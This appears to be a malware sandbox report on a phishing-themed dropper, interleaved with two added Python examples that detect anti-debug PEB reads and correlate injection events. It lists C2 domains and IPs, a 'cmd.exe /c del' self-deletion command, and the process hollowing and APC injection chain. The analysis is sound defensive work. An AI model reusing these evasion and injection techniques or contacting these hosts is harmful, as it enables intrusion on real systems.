          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03068EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03063D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03047D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 2_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 1_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 1_2_00D7439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 2_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 2_2_00D7439B SetUnhandledExceptionFilter,
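Every "mov eax, dword ptr fs:[00000030h]" row above is a PEB pointer load: in a 32-bit (here WoW64) process fs:[30h] is TEB.ProcessEnvironmentBlock, and the usual next step is a read of PEB.BeingDebugged (+2) or PEB.NtGlobalFlag (+68h). The "Process queried: DebugPort" rows are the complementary runtime check through NtQueryInformationProcess. The Python below is an added example, not Joe Sandbox code and not taken from the sample: it does what the static signature does, a linear scan of a code blob for both encodings of a 32-bit "mov r32, fs:[disp32]", and classifies the TEB field hit. The SAMPLE bytes are constructed for the example; the helper names are the example's own.

```python
"""
Scan a 32-bit code blob for 'mov r32, dword ptr fs:[disp32]' loads, the
pattern behind the fs:[00000030h] rows in the report.  The SAMPLE blob is
constructed for this example and is not taken from the analysed binary.
"""
from __future__ import annotations
from dataclasses import dataclass
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Well-known 32-bit TEB offsets reached through the FS segment.
TEB_FIELDS = {
    0x18: "TEB.Self (NtTib.Self)",
    0x30: "TEB.ProcessEnvironmentBlock (PEB pointer)",
}


@dataclass
class FsRead:
    offset: int   # position of the FS prefix (0x64) in the blob
    reg: str      # destination register
    disp: int     # displacement inside the TEB
    text: str     # MASM-style rendering, as the sandbox prints it


def _render(reg: str, disp: int) -> str:
    return f"mov {reg}, dword ptr fs:[{disp:08X}h]"


def find_fs_reads(code: bytes) -> list[FsRead]:
    """Linear scan for the two encodings of a 32-bit fs:[disp32] load:

        64 A1 <disp32>            mov eax, fs:[disp32]   (moffs32 short form)
        64 8B <modrm> <disp32>    mov r32, fs:[disp32]   (mod=00, rm=101)

    The scan is not instruction-aligned, so hits are triage leads that
    should be confirmed in a disassembler, exactly like the static rows above.
    """
    hits: list[FsRead] = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x64:                       # FS segment override prefix
            i += 1
            continue
        if i + 6 <= n and code[i + 1] == 0xA1:    # mov eax, moffs32
            disp = struct.unpack_from("<I", code, i + 2)[0]
            hits.append(FsRead(i, "eax", disp, _render("eax", disp)))
            i += 6
            continue
        if i + 7 <= n and code[i + 1] == 0x8B:    # mov r32, r/m32
            modrm = code[i + 2]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 0 and rm == 5:              # [disp32], no base register
                disp = struct.unpack_from("<I", code, i + 3)[0]
                hits.append(FsRead(i, REG32[reg], disp, _render(REG32[reg], disp)))
                i += 7
                continue
        i += 1
    return hits


def peb_reads(code: bytes) -> list[FsRead]:
    """Only the fs:[30h] hits, i.e. the PEB pointer loads the report lists."""
    return [h for h in find_fs_reads(code) if h.disp == 0x30]


# Constructed blob (hand-assembled, not from the sample):
#   55 8B EC                push ebp / mov ebp, esp
#   64 A1 30 00 00 00       mov eax, dword ptr fs:[30h]      ; PEB
#   0F B6 40 02             movzx eax, byte ptr [eax+2]      ; PEB.BeingDebugged
#   64 8B 0D 30 00 00 00    mov ecx, dword ptr fs:[30h]      ; PEB again
#   8B 41 68                mov eax, dword ptr [ecx+68h]     ; PEB.NtGlobalFlag
#   64 8B 15 18 00 00 00    mov edx, dword ptr fs:[18h]      ; TEB.Self, not PEB
#   A1 30 00 00 00          mov eax, dword ptr ds:[30h]      ; no FS prefix: decoy
#   C3                      ret
SAMPLE = bytes.fromhex(
    "558BEC" "64A130000000" "0FB64002" "648B0D30000000"
    "8B4168" "648B1518000000" "A130000000" "C3"
)

if __name__ == "__main__":
    for h in find_fs_reads(SAMPLE):
        print(f"+{h.offset:04X}  {h.text}  ; {TEB_FIELDS.get(h.disp, 'unknown TEB field')}")
```

Run it on a dumped region (for instance the `.unpack` files the report's Yara section names) by replacing SAMPLE with the file bytes; a cluster of fs:[30h] loads followed by byte reads at +2 or dword reads at +68h is the BeingDebugged / NtGlobalFlag idiom, while fs:[18h] alone is ordinary TEB housekeeping.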

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Domain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe Network Connect: 142.250.185.115 80
          Source: C:\Windows\explorer.exe Domain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exe Domain query: www.keilaniclothing.com
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 2F0000
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Thread register set: target process: 3616
          Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3616
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Process created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.290054860.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.299103436.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager,
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 1_2_00D73283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 1_2_00D73EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
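Read together, the rows above are one chain: aeokw.exe unmaps the svchost.exe image and maps execute-read-write sections into svchost.exe and explorer.exe, queues an APC into explorer.exe and sets a thread context (process hollowing plus APC injection), explorer.exe then resolves and connects to the C2 hosts, and svchost.exe spawns "cmd.exe /c del" on the dropper. The rows are grouped by signature rather than by time, so any correlation has to be order-free. The Python below is an added example, not Joe Sandbox code: it parses sandbox-style "Source: <path> <event>: <detail>" rows (with or without a separator between path and event, as in the extracted text) and turns them into those four findings. EVENTS is a constructed log modelled on the rows above; the rule names and the Finding fields are the example's own.

```python
"""
Correlate sandbox behaviour rows into the injection chain described in the
'HIPS / PFW / Operating System Protection Evasion' section.  EVENTS is a
constructed log modelled on the report rows; the rules are this example's.
"""
from __future__ import annotations
import re
from collections import defaultdict
from typing import NamedTuple

EVENT_KINDS = (
    "Section unmapped", "Section loaded", "Thread APC queued",
    "Thread register set", "Process created", "Network Connect", "Domain query",
)
# Splitting on the known event keyword works whether or not a separator
# survived between the source path and the event name.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*(?P<kind>" + "|".join(map(re.escape, EVENT_KINDS)) + r"):\s*(?P<detail>.*)$"
)
TARGET_RE = re.compile(r"(?:unknown target|target process):\s*(?P<t>.+?)(?:\s+protection:\s*(?P<prot>.*))?$")
DEL_RE = re.compile(r'cmd\.exe\s+/c\s+del\s+"?(?P<path>[^"]+?)"?\s*$', re.I)


class Finding(NamedTuple):
    source: str
    target: str
    technique: str


def parse_rows(rows: list[str]) -> list[tuple[str, str, str]]:
    """(source, kind, detail) for every row that matches ROW_RE; others are skipped."""
    out = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            out.append((m["src"], m["kind"], m["detail"].strip()))
    return out


def _target(detail: str) -> tuple[str, str]:
    """(target, protection) from a Section/Thread row.  'Section unmapped'
    rows carry the target before ' base address:' instead of a label."""
    m = TARGET_RE.search(detail)
    if m:
        return m["t"], (m["prot"] or "")
    return detail.split(" base address:")[0], ""


def correlate(rows: list[str]) -> list[Finding]:
    events = parse_rows(rows)
    unmapped, rwx, apc = defaultdict(set), defaultdict(set), defaultdict(set)
    net = defaultdict(list)
    ctx_set: set[str] = set()
    for src, kind, detail in events:
        if kind == "Section unmapped":
            unmapped[src].add(_target(detail)[0])
        elif kind == "Section loaded":
            t, prot = _target(detail)
            if "execute" in prot:                 # only executable mappings count
                rwx[src].add(t)
        elif kind == "Thread APC queued":
            apc[src].add(_target(detail)[0])
        elif kind == "Thread register set":       # SetThreadContext on a foreign thread
            ctx_set.add(src)
        elif kind in ("Network Connect", "Domain query"):
            net[src].append(detail)

    findings: list[Finding] = []
    for src, targets in unmapped.items():         # hollowing: unmap + RWX map, same target
        for t in sorted(targets & rwx[src]):
            how = "unmap + RWX map" + (" + thread context set" if src in ctx_set else "")
            findings.append(Finding(src, t, f"process hollowing ({how})"))
    for src, targets in apc.items():              # APC into memory the source mapped
        for t in sorted(targets & rwx[src]):
            findings.append(Finding(src, t, "APC injection into RWX section"))
    injected = {t for targets in rwx.values() for t in targets}
    for t in sorted(injected):                    # injected process doing the C2 traffic
        if net[t]:
            findings.append(Finding(t, ", ".join(net[t]), "injected system process talks to network"))
    sources = {src for src, _, _ in events}
    for src, kind, detail in events:              # 'del' on a path that was itself a source
        m = DEL_RE.search(detail) if kind == "Process created" else None
        if m and m["path"] in sources:
            findings.append(Finding(src, m["path"], "dropper self-deletion via cmd.exe /c del"))
    return findings


# Constructed rows, modelled on the report (same paths, hosts and ports).
EVENTS = [
    r"Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80",
    r"Source: C:\Windows\explorer.exe Domain query: www.ultrakill.xyz",
    r"Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 2F0000",
    r"Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Thread register set: target process: 3616",
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"',
]

if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"{f.technique:58s} {f.source} -> {f.target}")
```

The "Thread register set" rows only give a PID (3616), so the hollowing rule treats a SetThreadContext from the same source as corroboration rather than requiring the PID to resolve to svchost.exe; the "read write" mapping from svchost.exe into explorer.exe is deliberately ignored, since a non-executable view on its own is not an injection.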

          Stealing of Sensitive Information

          Source: Yara match File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match; file source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
Source: Yara match; file source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; file source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; file source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
